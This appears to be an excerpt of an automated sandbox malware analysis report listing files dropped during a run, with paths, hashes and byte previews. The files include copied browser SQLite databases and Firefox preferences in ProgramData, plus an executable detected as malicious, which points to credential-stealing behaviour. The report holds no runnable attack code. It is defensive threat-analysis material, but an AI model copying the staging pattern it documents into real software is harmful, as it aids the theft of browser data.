Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\AFHDHC-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\BKFHCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\FBAAAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\GHCGDA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\GHDAAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\HCGDGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\IDHIEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BAFBFCBGHDGC\IEHDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\IIJDBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\JEHDHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGC\JEHDHI-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJDBAKEHD.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	530944
Entropy (8bit):	7.7381162964470676
Encrypted:	false
SSDEEP:	12288:WcdHpo/73vGjBKnTr/6p2vtJufuDf4TGHFnw9AAyJ044sP:WApMfWKnfg2juVTwKuDR
MD5:	EE52CB514436F37707471297448B1799
SHA1:	15BC180E285D103DB78C05D398EAB268F0F94842
SHA-256:	E1DFB36D4B99672B70881D92BE19DFD815EEFDFB6AEB62941F05B534E04205B4
SHA-512:	CCA4E710EB297B3E362EB0C26A71D4DD79997A06F6ECDDF9471B3E847E074EF94180A6604A3052CC93ACDA8F9A3B52E49F64DF0759E85BFC253D4ACE005A8B22
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.........E.....E...<...E.....E...............................................Rich............................PE..L...x..g...............).....\......Ho............@..........................`............@.................................@m..(....0.......................@......xP...............................O..@...............,............................text............................... ..`.rdata..............................@..@.data...............b..............@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\BAAFCA

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\BFIIID

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\FHCBGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\FHCBGI-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\GHCAKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\HJJJJK

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\HJJJJK-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\JDAEHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\JDBGDH

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\JJECAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEH\KJECFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.310750095957279
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr3:KooCEYhgYEL0In
MD5:	BAEF88F4966BA2EB5317C3FD2C741049
SHA1:	B4AB901D5310F6ECB167CCD2DCFB4418E5FDBF49
SHA-256:	1DF9A7D9EB56F4C74D7AC3703146428D3D2D2EF01E142CB1B4207084688C2BF4
SHA-512:	2514E980E76712F49831D1DD55D81BA1449568E34A47BA4177831F980F7C1A70DF66E19EFB69E2B6E46E0DA309A3A13877B243D0FAEB6739D64D91646701B277
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xfcc6d824, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42215590351350457
Encrypted:	false
SSDEEP:	1536:zznSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1kX:zznazag03A2UrzJDO
MD5:	567961B76B4DC55930E70F044893FFC8
SHA1:	B18F660AD4775723105B0490B9E9F75ED6D8AE9F
SHA-256:	5A3297794929093761FE9CC97D2B15FA3E7E5DF35CF8125DE456C6D9D72E5A3B
SHA-512:	E10F77EFA6C8A27F6DFBFF8019B2CA2CB0E8D4C97B68738D0B38E69E0EC82495C93CEFD3C8088CE8AEEA880207E4DFAB97F896E04594C4B5EB94EFBD92D91C23
Malicious:	false
